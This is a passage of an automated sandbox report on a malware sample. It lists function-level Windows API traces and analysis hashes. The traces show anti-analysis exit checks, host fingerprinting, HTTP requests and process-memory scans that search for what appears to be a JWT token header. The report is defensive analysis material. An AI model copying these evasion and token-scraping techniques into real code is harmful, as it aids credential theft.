                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                        • String ID:
                                                        • API String ID: 3532888709-0
                                                        • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                        • Instruction ID: 3893341b45124a69be38c8d97f904a8a1e8707fbb4da29029964e0462dd9d372
                                                        • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                        • Instruction Fuzzy Hash: F0512C71510208EBCB18FF64DE92EED77B5AF21701FB04198F44A665A1DB346B05CB52
                                                        Function 00B37337 Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 00B37345
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,00B37574,004205BD), ref: 00B37383
                                                        • memset.MSVCRT ref: 00B373D1
                                                        • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00B37525
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: OpenProcesslstrcpymemset
                                                        • String ID:
                                                        • API String ID: 224852652-0
                                                        • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                        • Instruction ID: 565a4e276bfbe93330fc9b7de39f67b1b0ae380c27d524dc796f14cb51b8a2a2
                                                        • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                        • Instruction Fuzzy Hash: 38518EF1D442189BDB24EBA0DC85BEDB7B4EF54305F2081E8E109A6281DF746A88CF59
                                                        Function 004140B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.MSVCRT ref: 004140D5
                                                        • RegOpenKeyExA.ADVAPI32(80000001,0082ABB0,00000000,00020119,?), ref: 004140F4
                                                        • RegQueryValueExA.ADVAPI32(?,0082B038,00000000,00000000,00000000,000000FF), ref: 00414118
                                                        • RegCloseKey.ADVAPI32(?), ref: 00414122
                                                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                                        • lstrcatA.KERNEL32(?,0082B248), ref: 0041415B
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$CloseOpenQueryValuememset
                                                        • String ID:
                                                        • API String ID: 2623679115-0
                                                        • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                        • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                                        • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                        • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                                        Function 00B34317 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.MSVCRT ref: 00B3433C
                                                        • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 00B3435B
                                                        • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 00B3437F
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B34389
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B343AE
                                                        • lstrcat.KERNEL32(?,0064A168), ref: 00B343C2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$CloseOpenQueryValuememset
                                                        • String ID:
                                                        • API String ID: 2623679115-0
                                                        • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                        • Instruction ID: e746a75b4e4d69ed586bd8d640fcd182d52f79de1d8e95f81203994a3b6d5dcc
                                                        • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                        • Instruction Fuzzy Hash: 804189B69401087BDB14FBE0DC46FEE777DAB99300F00459CB61957181EA756B888BE2
                                                        Function 00413560 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • strtok_s.MSVCRT ref: 00413588
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • strtok_s.MSVCRT ref: 004136D1
                                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008267A8,?,0042110C,?,00000000), ref: 0041A82B
                                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpystrtok_s$lstrlen
                                                        • String ID:
                                                        • API String ID: 3184129880-0
                                                        • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                        • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                                        • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                        • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                                        Function 0041B38C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • __lock.LIBCMT ref: 0041B39A
                                                          • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                                          • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                                          • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                                                        • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                                        • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                                          • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                                        • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
                                                        • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                                                        • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 2005412495-0
                                                        • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                        • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                                                        • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                        • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                                        Function 00B36C57 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 00B39B08
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 00B39B21
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 00B39B39
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 00B39B51
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 00B39B6A
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 00B39B82
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 00B39B9A
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 00B39BB3
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 00B39BCB
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 00B39BE3
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 00B39BFC
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 00B39C14
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 00B39C2C
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 00B39C45
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B21437: ExitProcess.KERNEL32 ref: 00B21478
                                                          • Part of subcall function 00B213C7: GetSystemInfo.KERNEL32(?), ref: 00B213D1
                                                          • Part of subcall function 00B213C7: ExitProcess.KERNEL32 ref: 00B213E5
                                                          • Part of subcall function 00B21377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00B21392
                                                          • Part of subcall function 00B21377: VirtualAllocExNuma.KERNEL32(00000000), ref: 00B21399
                                                          • Part of subcall function 00B21377: ExitProcess.KERNEL32 ref: 00B213AA
                                                          • Part of subcall function 00B21487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00B214A5
                                                          • Part of subcall function 00B21487: __aulldiv.LIBCMT ref: 00B214BF
                                                          • Part of subcall function 00B21487: __aulldiv.LIBCMT ref: 00B214CD
                                                          • Part of subcall function 00B21487: ExitProcess.KERNEL32 ref: 00B214FB
                                                          • Part of subcall function 00B369D7: GetUserDefaultLangID.KERNEL32 ref: 00B369DB
                                                          • Part of subcall function 00B213F7: ExitProcess.KERNEL32 ref: 00B2142D
                                                          • Part of subcall function 00B37AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00B2141E), ref: 00B37AE7
                                                          • Part of subcall function 00B37AB7: RtlAllocateHeap.NTDLL(00000000), ref: 00B37AEE
                                                          • Part of subcall function 00B37AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B37B06
                                                          • Part of subcall function 00B37B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B37B77
                                                          • Part of subcall function 00B37B47: RtlAllocateHeap.NTDLL(00000000), ref: 00B37B7E
                                                          • Part of subcall function 00B37B47: GetComputerNameA.KERNEL32(?,00000104), ref: 00B37B96
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B36D31
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B36D4F
                                                        • CloseHandle.KERNEL32(00000000), ref: 00B36D60
                                                        • Sleep.KERNEL32(00001770), ref: 00B36D6B
                                                        • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B36D81
                                                        • ExitProcess.KERNEL32 ref: 00B36D89
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                        • String ID:
                                                        • API String ID: 2525456742-0
                                                        • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                        • Instruction ID: a8840082b8f9cce6d0c045092c94c82c97dd461d0d86ab8a7ed03445c12dbcdb
                                                        • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                        • Instruction Fuzzy Hash: 41318875A40208BBCB04FBF0DC56FFD73B9AF16301F7055A8B152A2192EF745A04CA62
                                                        Function 004099C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                        • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                        • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                        • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                        • String ID:
                                                        • API String ID: 2311089104-0
                                                        • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                        • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                                        • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                        • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                                        Function 00B29C27 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B29C53
                                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B29C78
                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00B29C98
                                                        • ReadFile.KERNEL32(000000FF,?,00000000,00B216F6,00000000), ref: 00B29CC1
                                                        • LocalFree.KERNEL32(00B216F6), ref: 00B29CF7
                                                        • CloseHandle.KERNEL32(000000FF), ref: 00B29D01
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                        • String ID:
                                                        • API String ID: 2311089104-0
                                                        • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                        • Instruction ID: c985539bf272c63394357cbc607befeca93d23dcca2da9524318bfc343af5bae
                                                        • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                        • Instruction Fuzzy Hash: C6312BB8A00209EFDB14CF94D885BEE77F5FF49700F108198E919A7290C774AA41CFA1
                                                        Function 0041C9DE Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • __getptd.LIBCMT ref: 0041C9EA
                                                          • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                          • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                        • __amsg_exit.LIBCMT ref: 0041CA0A
                                                        • __lock.LIBCMT ref: 0041CA1A
                                                        • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                                        • free.MSVCRT ref: 0041CA4A
                                                        • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                        • String ID:
                                                        • API String ID: 634100517-0
                                                        • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                        • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                                        • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                        • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                                        Function 00B3CC45 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • __getptd.LIBCMT ref: 00B3CC51
                                                          • Part of subcall function 00B3C206: __getptd_noexit.LIBCMT ref: 00B3C209
                                                          • Part of subcall function 00B3C206: __amsg_exit.LIBCMT ref: 00B3C216
                                                        • __amsg_exit.LIBCMT ref: 00B3CC71
                                                        • __lock.LIBCMT ref: 00B3CC81
                                                        • InterlockedDecrement.KERNEL32(?), ref: 00B3CC9E
                                                        • free.MSVCRT ref: 00B3CCB1
                                                        • InterlockedIncrement.KERNEL32(0042B980), ref: 00B3CCC9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                        • String ID:
                                                        • API String ID: 634100517-0
                                                        • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                        • Instruction ID: 5d30191e5092ebf8aa702b229a0226b6c8fcaa1f4fcb3398368a61b85f959d72
                                                        • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                        • Instruction Fuzzy Hash: 55010031A00A24AFC720ABA49845B5DBFE0FF00710FB04296EC1877290CB346881DBD9
                                                        Function 00416F00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • strlen.MSVCRT ref: 00416F1F
                                                        • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                                          • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                                          • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                                        • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                                        • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                                          • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: strlen$MemoryProcessQueryReadVirtual
                                                        • String ID: @
                                                        • API String ID: 2950663791-2766056989
                                                        • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                        • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                                        • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                        • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                                        Function 00B37167 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • strlen.MSVCRT ref: 00B37186
                                                        • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00B37401,00000000,00420BA8,00000000,00000000), ref: 00B371B4
                                                          • Part of subcall function 00B36E37: strlen.MSVCRT ref: 00B36E48
                                                          • Part of subcall function 00B36E37: strlen.MSVCRT ref: 00B36E6C
                                                        • VirtualQueryEx.KERNEL32(00B37574,00000000,?,0000001C), ref: 00B371F9
                                                        • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B37401), ref: 00B3731A
                                                          • Part of subcall function 00B37047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00B3705F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: strlen$MemoryProcessQueryReadVirtual
                                                        • String ID: @
                                                        • API String ID: 2950663791-2766056989
                                                        • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                        • Instruction ID: 0e496e9f388924f06824b9c343f7b0745de73f62dfaad9305ba0afabe6d2235f
                                                        • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                        • Instruction Fuzzy Hash: 6151F4B1A04109ABDB18CF98D981AEFB7F6FF88300F208559F915A7240D734AA11DBA5
                                                        Function 004069B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
